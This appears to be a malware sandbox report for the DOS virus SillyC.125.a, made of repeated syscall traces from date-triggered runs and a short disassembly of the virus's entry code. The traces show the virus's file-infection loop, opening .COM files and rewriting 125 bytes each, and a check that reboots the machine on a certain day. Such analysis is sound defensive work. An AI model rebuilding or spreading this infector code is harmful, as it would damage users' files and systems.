Sample viewer

vx.netlux.org/Virus.DOS.SillyC.125.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:20:39.953000837Z 26 PC: 12a51 | Set disk transfer address
2018-12-17T22:20:39.957608985Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-17T22:20:39.960774738Z 78 PC: 12a68 | Find first file
2018-12-17T22:20:39.967462537Z 61 PC: 12a72 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:20:39.974755947Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:39.981995815Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:39.983760092Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.00022698Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.002630566Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.024850924Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.058053583Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.062220292Z 61 PC: 12a72 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:20:40.077681504Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.083966583Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.093409124Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.100299563Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.101647747Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.104804155Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.112652587Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.115371435Z 61 PC: 12a72 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:20:40.12357699Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.13090405Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.132764853Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.137021129Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.138938347Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.142137943Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.151013047Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.154246871Z 61 PC: 12a72 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:20:40.161434271Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.169287838Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.171255198Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.174591417Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.177492368Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.180386202Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.188261169Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.191494887Z 61 PC: 12a72 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:20:40.211490786Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.219720052Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.221860002Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.224813728Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.226368564Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.229754578Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.237887123Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.24061518Z 61 PC: 12a72 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:20:40.247709159Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.254270242Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.255630345Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.264086691Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.266081078Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.272708119Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.281256863Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.284791634Z 61 PC: 12a72 | Open file (Filename = 'PAH.COM')
2018-12-17T22:20:40.291486427Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.298276145Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.300085108Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.302808473Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.304610964Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.307668588Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.315558523Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.318630447Z 61 PC: 12a72 | Open file (Filename = 'TEST.COM')
2018-12-17T22:20:40.325957466Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.328800463Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.331573564Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.334735781Z 66 PC: 12ab2 | Move file pointer

{"DateBased":true,"Day":23,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:30.809509384Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:30.810944473Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:33.016340863Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:49:33.01817763Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:49:33.020551743Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:49:33.024185626Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:49:33.035885484Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:49:33.037437235Z 62 PC: 91fc1 | Close file
2018-12-25T11:49:33.040141482Z 75 PC: 91fe0 | Execute program
2018-12-25T11:49:33.058350573Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:49:33.059606328Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:49:33.064857959Z 48 PC: c609 | Get DOS version
2018-12-25T11:49:33.068578344Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:49:33.071057819Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:49:33.073510659Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:49:33.077745917Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:49:33.081834316Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:49:33.08720697Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:49:33.099605648Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:49:33.101356925Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:49:33.103887857Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:49:33.128675964Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:49:33.13297049Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:49:33.134268044Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:49:33.13609122Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:49:33.137273366Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.13897007Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.14018106Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:49:33.148476728Z 62 PC: 8f8eb | Close file
2018-12-25T11:49:33.150350474Z 62 PC: 8f8f2 | Close file
2018-12-25T11:49:33.160796202Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.162001006Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.163111687Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.164736254Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.166330198Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.167527036Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.16952574Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.170664706Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.171829655Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.173246399Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.175141292Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.176760124Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.178520835Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.18096066Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.182787347Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.184436257Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.186237211Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.187710787Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.189169792Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.191311236Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.19276207Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.194190005Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.196004833Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.197282146Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.198541064Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.200269735Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.201701584Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.203104769Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.205293111Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.207535885Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:49:33.213603249Z 62 PC: 8f90e | Close file
2018-12-25T11:49:33.215828475Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:49:33.217675829Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:49:33.219439531Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:49:33.225058859Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:49:33.226448041Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:49:33.231960008Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:49:33.233676673Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:49:33.235070565Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:49:33.23712232Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:49:33.239288723Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:49:33.240790512Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:49:33.24252036Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:49:33.244842592Z 73 PC: 8fa11 | Release memory
2018-12-25T11:49:33.246346479Z 73 PC: 8efea | Release memory
2018-12-25T11:49:33.247624053Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:49:33.251110114Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:49:33.253236812Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:49:33.254681948Z 73 PC: 8f060 | Release memory
2018-12-25T11:49:33.256453632Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:49:33.266036327Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:33.271863469Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:49:33.273528034Z 62 PC: 8f0d1 | Close file
2018-12-25T11:49:33.275472973Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:49:33.299007387Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:49:33.299922166Z 48 PC: 12bee | Get DOS version
2018-12-25T11:49:33.301533073Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:49:33.303952644Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:49:33.305278179Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:49:33.306515292Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:49:33.30783105Z 72 PC: 1355d | Allocate memory
2018-12-25T11:49:33.309211785Z 25 PC: 13596 | Get default drive
2018-12-25T11:49:33.310441683Z 71 PC: 135ad | Get current directory
2018-12-25T11:49:33.312844481Z 59 PC: 135ba | Change current directory
2018-12-25T11:49:33.318188347Z 59 PC: 135c8 | Change current directory
2018-12-25T11:49:33.324936254Z 59 PC: 135d3 | Change current directory
2018-12-25T11:49:33.328610464Z 25 PC: 12d13 | Get default drive
2018-12-25T11:49:33.329726952Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:49:33.330957412Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:49:33.331841833Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:49:33.334111249Z 80 PC: 1301d | Set current PSP
2018-12-25T11:49:33.336272183Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:49:33.337914664Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.33918769Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.340714914Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:49:33.342966893Z 72 PC: 130ec | Allocate memory
2018-12-25T11:49:33.344747788Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:49:33.351769739Z 62 PC: 131ba | Close file
2018-12-25T11:49:33.35411172Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:49:33.355301797Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:49:33.357527976Z 72 PC: 11991 | Allocate memory
2018-12-25T11:49:33.359169648Z 73 PC: 119b2 | Release memory
2018-12-25T11:49:33.360481377Z 72 PC: 119bd | Allocate memory
2018-12-25T11:49:33.363232884Z 73 PC: 119df | Release memory
2018-12-25T11:49:33.376852284Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:49:33.378777418Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:31.040005962Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:31.042878787Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:31.045687224Z 78 PC: 12a68 | Find first file
2018-12-25T11:49:31.05270913Z 61 PC: 12a72 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:31.061086049Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-25T11:49:31.068500733Z 66 PC: 12ab2 | Move file pointer
2018-12-25T11:49:31.070929119Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.087000218Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.090754577Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.098845581Z 62 PC: 12a99 | Close file
2018-12-25T11:49:31.108250633Z 79 PC: 12a9f | Find next file
2018-12-25T11:49:31.11184254Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.119212575Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.126445648Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.129013916Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.132083788Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.134430952Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.138066167Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.147413138Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.150382734Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.158432713Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.165336533Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.166882677Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.170364441Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.172108853Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.174897262Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.201669187Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.204801874Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.213647085Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.221999969Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.223797744Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.226857172Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.228516985Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.232127823Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.24094385Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.243681316Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.256797231Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.263968985Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.265876567Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.272344724Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.274101861Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.27740619Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.28725896Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.290119784Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.297454682Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.305451928Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.306528867Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.313853767Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.317748538Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.326391288Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.332235069Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.334237099Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.339238849Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.34627722Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.347890833Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.351484242Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.352901007Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.356468612Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.366362285Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.369745019Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.377282268Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.38124539Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.383544111Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.386421471Z 66 PC: 12ab2 | Move file pointer (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:31.148901765Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:31.152198057Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:31.153808942Z 78 PC: 12a68 | Find first file
2018-12-25T11:49:31.157691274Z 61 PC: 12a72 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:31.162982865Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-25T11:49:31.168383857Z 66 PC: 12ab2 | Move file pointer
2018-12-25T11:49:31.170019286Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.184364666Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.187343331Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.194538442Z 62 PC: 12a99 | Close file
2018-12-25T11:49:31.207254224Z 79 PC: 12a9f | Find next file
2018-12-25T11:49:31.219164924Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.224577063Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.228700678Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.230321994Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.232748036Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.233714883Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.236097144Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.241032021Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.242664808Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.246897357Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.250814616Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.25180038Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.253965317Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.255168152Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.257485646Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.27442588Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.276841975Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.284608786Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.294446549Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.295950796Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.298693205Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.301004743Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.303574516Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.311082535Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.313781926Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.320473116Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.326877287Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.332576529Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.335256479Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.336437404Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.339264984Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.347018386Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.350435217Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.358883764Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.366543089Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.368397012Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.376614044Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.378576117Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.385393687Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.39389689Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.396825977Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.403652965Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.409792148Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.411697666Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.414163975Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.415341881Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.418510638Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.426431738Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.428946336Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.435901721Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.44264098Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.444278671Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.446507979Z 66 PC: 12ab2 | Move file pointer (See above)

{"DateBased":true,"Day":23,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:31.235478635Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:31.237129261Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:33.430886601Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:49:33.432461038Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:49:33.435332165Z 99 PC: 90858 | Get DBCS lead byte table pointer
